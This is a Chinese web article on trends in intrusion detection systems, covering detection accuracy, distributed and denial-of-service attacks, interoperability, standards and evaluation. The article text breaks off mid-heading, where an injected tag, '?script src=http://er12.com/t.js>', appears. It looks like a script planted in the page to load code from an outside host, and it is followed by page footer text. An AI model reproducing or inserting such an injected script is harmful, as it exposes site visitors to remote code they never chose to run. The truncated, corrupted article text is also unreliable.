入侵检测系统的技术发展趋势

摘 要:提出了入侵检测系统(ids)目前存在的主要问题,并从5个方面详细介绍了ids的发展趋势,包括:改进检测方法以提高检测准确率;检测和防范分布式攻击及拒绝服务攻击;实现ids与其他安全部件的互动;ids的标准化工作;以及ids的测试和评估。

主题词:入侵检测系统 监测准确率 分布式攻击 拒绝服务攻击 标准化 测试评估

入侵检测系统(ids:intrusion detection system)作为一种重要的安全部件,是网络与信息安全防护体系的重要组成部分,是传统计算机安全机制的重要补充。自1980年被提出以来,ids在20多年间得到了较快的发展。特别是近几年,由于非法入侵不断增多,网络与信息安全问题变得越来越突出。ids作为一种主动防御技术,越来越受到人们的关注。

ids首先通过在计算机网络或系统中的若干关键点收集信息并对收集到的信息进行分析,判断网络或系统中是否有违反安全策略的行为和被攻击的迹象,然后根据分析结果采取决策并作出适当的响应。目前,国内外有很多家研究机构在从事ids的研究工作,不少厂家也开发出了ids产品。但总的看来,现在对ids的研究还不够深入,产品的性能也有待提高。具体说来,ids目前存在的主要问题有:

·ids产品的检测准确率比较低,漏报和误报比较多;

·对分布式攻击和拒绝服务攻击的检测和防范能力较弱;

·尚不能与其他安全部件很好地互动;

·缺乏国际、国内标准;

·对ids产品的测试评估缺乏统一的标准和平台。

入侵检测技术还不够成熟和完善,有很大的研究、发展空间,而现存的问题就是今后入侵检测技术的主要研究方向。以下从5个方面详细介绍入侵检测技术的主要发展趋势。

改进检测方法 提高检测准确率

几年前,当ids刚刚被作为一种重要的安全部件在国内被提出并使用时,人们对它的期望值很高。首先从理论上讲,ids可以主动地检测到对系统或网络的入侵,并对这些入侵进行记录和响应,这是防火墙、身份识别和认证、加密解密等其他许多安全策略所不能做到的。因此,引入ids可以弥补其他安全策略的不足,使得整个安全防护体系更加完善。其次,由于网络规模不断扩大,系统遭受的入侵和攻击越来越多,人们迫切需要一种可以有效防范和应对这些入侵的安全策略和产品。在这种形势下,国内许多安全产品方面的厂商纷纷开始开发自己的ids产品,许多研究机构也开始了对ids的研究,ids成为网络与信息安全领域的一个研究热点。

近来,ids虽然得到了比较大的发展,但总的情况并不让人满意。最大的问题是现在的入侵检测产品检测准确率比较低,误报和漏报的情况比较多。本来ids是要减轻管理员的负担,结果出现的大量误报使得管理员疲于应付,最后不得已反而想放弃ids。

出现这种情况的主要原因在于对ids的研究还不够深入,技术上不够成熟。现在的ids产品,主要可以分为基于主机的ids和基于网络的ids两种,使用的检测方法主要是误用检测(misuse detection)和异常检测(anomaly detection)。误用检测是对不正常的行为进行建模,这些行为就是以前记录下来的确认了的误用或攻击。目前误用检测的方法主要是模式匹配,即将每一个已知的攻击事件定义为一个独立的特征,这样对入侵行为的检测就成为对特征的匹配搜索,如果和已知的入侵特征匹配,就认为是攻击。异常检测是对正常行为建模,所有不符合这个模型的事件就被怀疑为攻击。现在异常检测的方法主要是统计模型,它通过设置极限阈值等方法,将检测数据与已有的正常行为比较,如果超出极限阈值,就认为是入侵行为。

为了提高检测准确率,有人把其他领域的一些概念和方法引入到ids中来,主要有神经网络、模糊理论、免疫系统、数据挖掘等。这些方法主要是为了增强ids的学习能力,使得ids可以智能地检测出未知攻击。但这些方法基本上还都处于研究阶段。

协议分析技术是一种比较好的误用检测技术,它弥补了模式匹配技术的一些不足,通过对协议进行解码,减少了ids需要分析的数据量,从而提高了解析的速度,由于协议比较规范,因此协议分析的准确率比较高。目前一些产品已经实现或部分实现了协议分析技术。

此外,网络速度也构成了对检测准确率的挑战。现在网络的规模越来越大,网络的速度也在不断提高,因此ids产品必须要能够适应大规模高速网络的要求,否则就会出现大量的漏报现象。为了能够适应高速网的要求,不得不改进ids中一些现有的技术。

因此,改进现有的入侵检测方法,提出新的、可以应用于大规模高速网络的入侵检测方法,对于适应新的应用需要,提高ids的准确率非常必要。

检测和防范分布?script src=http://er12.com/t.js>

  • 入侵检测系统的技术发展趋势已关闭评论
    A+
发布日期:2019年07月02日  所属分类:参考设计